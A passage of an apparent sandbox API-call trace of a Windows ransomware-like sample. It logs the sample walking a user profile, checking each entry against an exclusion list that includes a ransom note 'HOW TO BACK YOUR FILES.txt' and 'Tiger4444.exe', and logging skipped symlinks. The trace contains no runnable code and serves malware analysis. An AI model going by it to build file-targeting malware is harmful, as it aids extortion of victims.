lpBuffer=0xc708ac*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x30aca68, lpOverlapped=0x0 | out: lpBuffer=0xc708ac*, lpNumberOfBytesWritten=0x30aca68*=0x3d4, lpOverlapped=0x0) returned 1 [0045.004] FlushFileBuffers (hFile=0x2ac) returned 1 [0045.005] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0045.005] CloseHandle (hObject=0x2ac) returned 1 [0045.005] lstrlenW (lpString="C:\\Users\\FD1HVy") returned 15 [0045.005] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0045.006] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\*", lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x7fd7bdc0, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xc72d48 [0045.006] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0045.006] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0045.006] lstrcmpiW (lpString1=".", lpString2="Tiger4444.exe") returned -1 [0045.006] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0045.006] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x7fd7bdc0, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0045.006] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0045.006] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0045.006] lstrcmpiW (lpString1="..", lpString2="Tiger4444.exe") returned -1 [0045.006] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0045.006] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0045.006] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x7fd7bdc0, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x7fd7bdc0, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x7fd7bdc0, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0045.006] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0045.006] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0045.006] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x210870f2, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x3b5a0677, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x3b5a0677, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AppData", cAlternateFileName="")) returned 1 [0045.006] lstrcmpiW (lpString1="AppData", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0045.006] lstrcmpiW (lpString1="AppData", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0045.006] lstrcmpiW (lpString1="AppData", lpString2="Tiger4444.exe") returned -1 [0045.006] lstrcmpiW (lpString1="AppData", lpString2=".") returned 1 [0045.006] lstrcmpiW (lpString1="AppData", lpString2="..") returned 1 [0045.006] lstrcmpiW (lpString1="AppData", lpString2="windows") returned -1 [0045.006] lstrcmpiW (lpString1="AppData", lpString2="bootmgr") returned -1 [0045.006] lstrcmpiW (lpString1="AppData", lpString2="pagefile.sys") returned -1 [0045.006] lstrcmpiW (lpString1="AppData", lpString2="boot") returned -1 [0045.006] lstrcmpiW (lpString1="AppData", lpString2="ids.txt") returned -1 [0045.006] lstrcmpiW (lpString1="AppData", lpString2="NTUSER.DAT") returned -1 [0045.006] lstrcpyW (in: lpString1=0x30aeac8, lpString2="AppData" | out: lpString1="AppData") returned="AppData" [0045.006] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc664c0 [0045.006] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x30) returned 0xc67608 [0045.006] RtlInterlockedPushEntrySList (in: ListHead=0xc66828, ListEntry=0xc664c8 | out: ListHead=0xc66828, ListEntry=0xc664c8) returned 0xc666e8 [0045.006] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x211de47b, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x211de47b, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x211de47b, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Application Data", cAlternateFileName="APPLIC~1")) returned 1 [0045.006] lstrcmpiW (lpString1="Application Data", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0045.006] lstrcmpiW (lpString1="Application Data", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0045.006] lstrcmpiW (lpString1="Application Data", lpString2="Tiger4444.exe") returned -1 [0045.006] lstrcmpiW (lpString1="Application Data", lpString2=".") returned 1 [0045.007] lstrcmpiW (lpString1="Application Data", lpString2="..") returned 1 [0045.007] lstrcmpiW (lpString1="Application Data", lpString2="windows") returned -1 [0045.007] lstrcmpiW (lpString1="Application Data", lpString2="bootmgr") returned -1 [0045.007] lstrcmpiW (lpString1="Application Data", lpString2="pagefile.sys") returned -1 [0045.007] lstrcmpiW (lpString1="Application Data", lpString2="boot") returned -1 [0045.007] lstrcmpiW (lpString1="Application Data", lpString2="ids.txt") returned -1 [0045.007] lstrcmpiW (lpString1="Application Data", lpString2="NTUSER.DAT") returned -1 [0045.007] lstrcpyW (in: lpString1=0x30aeac8, lpString2="Application Data" | out: lpString1="Application Data") returned="Application Data" [0045.007] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Application Data", dwFileAttributes=0x2412) returned 1 [0045.007] wsprintfA (in: param_1=0x30ae2a8, param_2="[IGNORE SIMLINK] %S\r\n" | out: param_1="[IGNORE SIMLINK] C:\\Users\\FD1HVy\\Application Data\r\n") returned 51 [0045.007] lstrlenA (lpString="[IGNORE SIMLINK] C:\\Users\\FD1HVy\\Application Data\r\n") returned 51 [0045.007] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\ids.txt" (normalized: "c:\\users\\fd1hvy\\desktop\\ids.txt"), dwDesiredAccess=0xe0003, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0045.007] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x573 [0045.007] WriteFile (in: hFile=0x260, lpBuffer=0x30ae2a8*, nNumberOfBytesToWrite=0x33, lpNumberOfBytesWritten=0x30ada64, lpOverlapped=0x0 | out: lpBuffer=0x30ae2a8*, lpNumberOfBytesWritten=0x30ada64*=0x33, lpOverlapped=0x0) returned 1 [0045.009] CloseHandle (hObject=0x260) returned 1 [0045.010] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x440792d0, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xd43ecce6, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xce2cb2cd, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Contacts", cAlternateFileName="")) returned 1 [0045.010] lstrcmpiW (lpString1="Contacts", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0045.010] lstrcmpiW (lpString1="Contacts", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0045.010] lstrcmpiW (lpString1="Contacts", lpString2="Tiger4444.exe") returned -1 [0045.010] lstrcmpiW (lpString1="Contacts", lpString2=".") returned 1 [0045.010] lstrcmpiW (lpString1="Contacts", lpString2="..") returned 1 [0045.010] lstrcmpiW (lpString1="Contacts", lpString2="windows") returned -1 [0045.010] lstrcmpiW (lpString1="Contacts", lpString2="bootmgr") returned 1 [0045.010] lstrcmpiW (lpString1="Contacts", lpString2="pagefile.sys") returned -1 [0045.010] lstrcmpiW (lpString1="Contacts", lpString2="boot") returned 1 [0045.010] lstrcmpiW (lpString1="Contacts", lpString2="ids.txt") returned -1 [0045.010] lstrcmpiW (lpString1="Contacts", lpString2="NTUSER.DAT") returned -1 [0045.010] lstrcpyW (in: lpString1=0x30aeac8, lpString2="Contacts" | out: lpString1="Contacts") returned="Contacts" [0045.010] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Contacts", dwFileAttributes=0x10) returned 1 [0045.010] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc664e0 [0045.010] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x32) returned 0xc72d88 [0045.010] RtlInterlockedPushEntrySList (in: ListHead=0xc66828, ListEntry=0xc664e8 | out: ListHead=0xc66828, ListEntry=0xc664e8) returned 0xc664c8 [0045.010] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x211de47b, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x211de47b, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x211de47b, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Cookies", cAlternateFileName="")) returned 1 [0045.010] lstrcmpiW (lpString1="Cookies", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0045.010] lstrcmpiW (lpString1="Cookies", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0045.010] lstrcmpiW (lpString1="Cookies", lpString2="Tiger4444.exe") returned -1 [0045.010] lstrcmpiW (lpString1="Cookies", lpString2=".") returned 1 [0045.010] lstrcmpiW (lpString1="Cookies", lpString2="..") returned 1 [0045.010] lstrcmpiW (lpString1="Cookies", lpString2="windows") returned -1 [0045.010] lstrcmpiW (lpString1="Cookies", lpString2="bootmgr") returned 1 [0045.010] lstrcmpiW (lpString1="Cookies", lpString2="pagefile.sys") returned -1 [0045.010] lstrcmpiW (lpString1="Cookies", lpString2="boot") returned 1 [0045.010] lstrcmpiW (lpString1="Cookies", lpString2="ids.txt") returned -1 [0045.010] lstrcmpiW (lpString1="Cookies", lpString2="NTUSER.DAT") returned -1 [0045.011] lstrcpyW (in: lpString1=0x30aeac8, lpString2="Cookies" | out: lpString1="Cookies") returned="Cookies" [0045.011] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Cookies", dwFileAttributes=0x2412) returned 1 [0045.011] wsprintfA (in: param_1=0x30ae2a8, param_2="[IGNORE SIMLINK] %S\r\n" | out: param_1="[IGNORE SIMLINK] C:\\Users\\FD1HVy\\Cookies\r\n") returned 42 [0045.011] lstrlenA (lpString="[IGNORE SIMLINK] C:\\Users\\FD1HVy\\Cookies\r\n") returned 42 [0045.011] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\ids.txt" (normalized: "c:\\users\\fd1hvy\\desktop\\ids.txt"), dwDesiredAccess=0xe0003, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0045.011] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x5a6 [0045.011] WriteFile (in: hFile=0x260, lpBuffer=0x30ae2a8*, nNumberOfBytesToWrite=0x2a, lpNumberOfBytesWritten=0x30ada64, lpOverlapped=0x0 | out: lpBuffer=0x30ae2a8*, lpNumberOfBytesWritten=0x30ada64*=0x2a, lpOverlapped=0x0) returned 1 [0045.013] CloseHandle (hObject=0x260) returned 1 [0045.014] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x7b7866a3, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x7b7866a3, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 1 [0045.014] lstrcmpiW (lpString1="Desktop", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0045.014] lstrcmpiW (lpString1="Desktop", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0045.014] lstrcmpiW (lpString1="Desktop", lpString2="Tiger4444.exe") returned -1 [0045.014] lstrcmpiW (lpString1="Desktop", lpString2=".") returned 1 [0045.014] lstrcmpiW (lpString1="Desktop", lpString2="..") returned 1 [0045.014] lstrcmpiW (lpString1="Desktop", lpString2="windows") returned -1 [0045.014] lstrcmpiW (lpString1="Desktop", lpString2="bootmgr") returned 1 [0045.014] lstrcmpiW (lpString1="Desktop", lpString2="pagefile.sys") returned -1 [0045.014] lstrcmpiW (lpString1="Desktop", lpString2="boot") returned 1 [0045.014] lstrcmpiW (lpString1="Desktop", lpString2="ids.txt") returned -1 [0045.014] lstrcmpiW (lpString1="Desktop", lpString2="NTUSER.DAT") returned -1 [0045.014] lstrcpyW (in: lpString1=0x30aeac8, lpString2="Desktop" | out: lpString1="Desktop") returned="Desktop" [0045.014] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop", dwFileAttributes=0x10) returned 1 [0045.014] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc66300 [0045.014] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x30) returned 0xc67b80 [0045.014] RtlInterlockedPushEntrySList (in: ListHead=0xc66828, ListEntry=0xc66308 | out: ListHead=0xc66828, ListEntry=0xc66308) returned 0xc664e8 [0045.014] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x6840edeb, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x6840edeb, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Documents", cAlternateFileName="DOCUME~1")) returned 1 [0045.014] lstrcmpiW (lpString1="Documents", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0045.014] lstrcmpiW (lpString1="Documents", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0045.014] lstrcmpiW (lpString1="Documents", lpString2="Tiger4444.exe") returned -1 [0045.014] lstrcmpiW (lpString1="Documents", lpString2=".") returned 1 [0045.014] lstrcmpiW (lpString1="Documents", lpString2="..") returned 1 [0045.014] lstrcmpiW (lpString1="Documents", lpString2="windows") returned -1 [0045.014] lstrcmpiW (lpString1="Documents", lpString2="bootmgr") returned 1 [0045.014] lstrcmpiW (lpString1="Documents", lpString2="pagefile.sys") returned -1 [0045.014] lstrcmpiW (lpString1="Documents", lpString2="boot") returned 1 [0045.014] lstrcmpiW (lpString1="Documents", lpString2="ids.txt") returned -1 [0045.014] lstrcmpiW (lpString1="Documents", lpString2="NTUSER.DAT") returned -1 [0045.014] lstrcpyW (in: lpString1=0x30aeac8, lpString2="Documents" | out: lpString1="Documents") returned="Documents" [0045.014] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents", dwFileAttributes=0x10) returned 1 [0045.015] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc66360 [0045.015] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x34) returned 0xc72e48 [0045.015] RtlInterlockedPushEntrySList (in: ListHead=0xc66828, ListEntry=0xc66368 | out: ListHead=0xc66828, ListEntry=0xc66368) returned 0xc66308 [0045.015] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xc19bd8f2, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xc19bd8f2, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Downloads", cAlternateFileName="DOWNLO~1")) returned 1 [0045.015] lstrcmpiW (lpString1="Downloads", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0045.015] lstrcmpiW (lpString1="Downloads", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0045.015] lstrcmpiW (lpString1="Downloads", lpString2="Tiger4444.exe") returned -1 [0045.015] lstrcmpiW (lpString1="Downloads", lpString2=".") returned 1 [0045.015] lstrcmpiW (lpString1="Downloads", lpString2="..") returned 1 [0045.015] lstrcmpiW (lpString1="Downloads", lpString2="windows") returned -1 [0045.015] lstrcmpiW (lpString1="Downloads", lpString2="bootmgr") returned 1 [0045.015] lstrcmpiW (lpString1="Downloads", lpString2="pagefile.sys") returned -1 [0045.015] lstrcmpiW (lpString1="Downloads", lpString2="boot") returned 1 [0045.015] lstrcmpiW (lpString1="Downloads", lpString2="ids.txt") returned -1 [0045.015] lstrcmpiW (lpString1="Downloads", lpString2="NTUSER.DAT") returned -1 [0045.015] lstrcpyW (in: lpString1=0x30aeac8, lpString2="Downloads" | out: lpString1="Downloads") returned="Downloads" [0045.015] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Downloads", dwFileAttributes=0x10) returned 1 [0045.015] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc666a0 [0045.015] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x34) returned 0xc72f88 [0045.015] RtlInterlockedPushEntrySList (in: ListHead=0xc66828, ListEntry=0xc666a8 | out: ListHead=0xc66828, ListEntry=0xc666a8) returned 0xc66368 [0045.015] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xd4499d75, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xce2f1526, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Favorites", cAlternateFileName="FAVORI~1")) returned 1 [0045.015] lstrcmpiW (lpString1="Favorites", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0045.015] lstrcmpiW (lpString1="Favorites", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0045.015] lstrcmpiW (lpString1="Favorites", lpString2="Tiger4444.exe") returned -1 [0045.015] lstrcmpiW (lpString1="Favorites", lpString2=".") returned 1 [0045.015] lstrcmpiW (lpString1="Favorites", lpString2="..") returned 1 [0045.016] lstrcmpiW (lpString1="Favorites", lpString2="windows") returned -1 [0045.016] lstrcmpiW (lpString1="Favorites", lpString2="bootmgr") returned 1 [0045.016] lstrcmpiW (lpString1="Favorites", lpString2="pagefile.sys") returned -1 [0045.016] lstrcmpiW (lpString1="Favorites", lpString2="boot") returned 1 [0045.016] lstrcmpiW (lpString1="Favorites", lpString2="ids.txt") returned -1 [0045.016] lstrcmpiW (lpString1="Favorites", lpString2="NTUSER.DAT") returned -1 [0045.016] lstrcpyW (in: lpString1=0x30aeac8, lpString2="Favorites" | out: lpString1="Favorites") returned="Favorites" [0045.016] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Favorites", dwFileAttributes=0x10) returned 1 [0045.016] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc66320 [0045.016] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x34) returned 0xc72e88 [0045.016] RtlInterlockedPushEntrySList (in: ListHead=0xc66828, ListEntry=0xc66328 | out: ListHead=0xc66828, ListEntry=0xc66328) returned 0xc666a8 [0045.016] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x9463e5c0, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0x9463e5c0, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Links", cAlternateFileName="")) returned 1 [0045.016] lstrcmpiW (lpString1="Links", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0045.016] lstrcmpiW (lpString1="Links", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0045.016] lstrcmpiW (lpString1="Links", lpString2="Tiger4444.exe") returned -1 [0045.016] lstrcmpiW (lpString1="Links", lpString2=".") returned 1 [0045.016] lstrcmpiW (lpString1="Links", lpString2="..") returned 1 [0045.016] lstrcmpiW (lpString1="Links", lpString2="windows") returned -1 [0045.016] lstrcmpiW (lpString1="Links", lpString2="bootmgr") returned 1 [0045.016] lstrcmpiW (lpString1="Links", lpString2="pagefile.sys") returned -1 [0045.016] lstrcmpiW (lpString1="Links", lpString2="boot") returned 1 [0045.016] lstrcmpiW (lpString1="Links", lpString2="ids.txt") returned 1 [0045.016] lstrcmpiW (lpString1="Links", lpString2="NTUSER.DAT") returned -1 [0045.016] lstrcpyW (in: lpString1=0x30aeac8, lpString2="Links" | out: lpString1="Links") returned="Links" [0045.016] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Links", dwFileAttributes=0x10) returned 1 [0045.016] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc66340 [0045.016] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x2c) returned 0xc678a8 [0045.016] RtlInterlockedPushEntrySList (in: ListHead=0xc66828, ListEntry=0xc66348 | out: ListHead=0xc66828, ListEntry=0xc66348) returned 0xc66328 [0045.017] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x211de47b, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x211de47b, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x211de47b, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Local Settings", cAlternateFileName="LOCALS~1")) returned 1 [0045.017] lstrcmpiW (lpString1="Local Settings", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0045.017] lstrcmpiW (lpString1="Local Settings", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0045.017] lstrcmpiW (lpString1="Local Settings", lpString2="Tiger4444.exe") returned -1 [0045.017] lstrcmpiW (lpString1="Local Settings", lpString2=".") returned 1 [0045.017] lstrcmpiW (lpString1="Local Settings", lpString2="..") returned 1 [0045.017] lstrcmpiW (lpString1="Local Settings", lpString2="windows") returned -1 [0045.017] lstrcmpiW (lpString1="Local Settings", lpString2="bootmgr") returned 1 [0045.017] lstrcmpiW (lpString1="Local Settings", lpString2="pagefile.sys") returned -1 [0045.017] lstrcmpiW (lpString1="Local Settings", lpString2="boot") returned 1 [0045.017] lstrcmpiW (lpString1="Local Settings", lpString2="ids.txt") returned 1 [0045.017] lstrcmpiW (lpString1="Local Settings", lpString2="NTUSER.DAT") returned -1 [0045.017] lstrcpyW (in: lpString1=0x30aeac8, lpString2="Local Settings" | out: lpString1="Local Settings") returned="Local Settings" [0045.017] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Local Settings", dwFileAttributes=0x2412) returned 1 [0045.017] wsprintfA (in: param_1=0x30ae2a8, param_2="[IGNORE SIMLINK] %S\r\n" | out: param_1="[IGNORE SIMLINK] C:\\Users\\FD1HVy\\Local Settings\r\n") returned 49 [0045.017] lstrlenA (lpString="[IGNORE SIMLINK] C:\\Users\\FD1HVy\\Local Settings\r\n") returned 49 [0045.017] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\ids.txt" (normalized: "c:\\users\\fd1hvy\\desktop\\ids.txt"), dwDesiredAccess=0xe0003, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0045.017] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x5d0 [0045.017] WriteFile (in: hFile=0x260, lpBuffer=0x30ae2a8*, nNumberOfBytesToWrite=0x31, lpNumberOfBytesWritten=0x30ada64, lpOverlapped=0x0 | out: lpBuffer=0x30ae2a8*, lpNumberOfBytesWritten=0x30ada64*=0x31, lpOverlapped=0x0) returned 1 [0045.019] CloseHandle (hObject=0x260) returned 1 [0045.020] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x68519f55, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x68519f55, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Music", cAlternateFileName="")) returned 1 [0045.020] lstrcmpiW (lpString1="Music", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0045.020] lstrcmpiW (lpString1="Music", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0045.020] lstrcmpiW (lpString1="Music", lpString2="Tiger4444.exe") returned -1 [0045.020] lstrcmpiW (lpString1="Music", lpString2=".") returned 1 [0045.020] lstrcmpiW (lpString1="Music", lpString2="..") returned 1 [0045.020] lstrcmpiW (lpString1="Music", lpString2="windows") returned -1 [0045.020] lstrcmpiW (lpString1="Music", lpString2="bootmgr") returned 1 [0045.020] lstrcmpiW (lpString1="Music", lpString2="pagefile.sys") returned -1 [0045.020] lstrcmpiW (lpString1="Music", lpString2="boot") returned 1 [0045.020] lstrcmpiW (lpString1="Music", lpString2="ids.txt") returned 1 [0045.020] lstrcmpiW (lpString1="Music", lpString2="NTUSER.DAT") returned -1 [0045.020] lstrcpyW (in: lpString1=0x30aeac8, lpString2="Music" | out: lpString1="Music") returned="Music" [0045.020] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music", dwFileAttributes=0x10) returned 1 [0045.020] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc66540 [0045.020] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x2c) returned 0xc676e8 [0045.020] 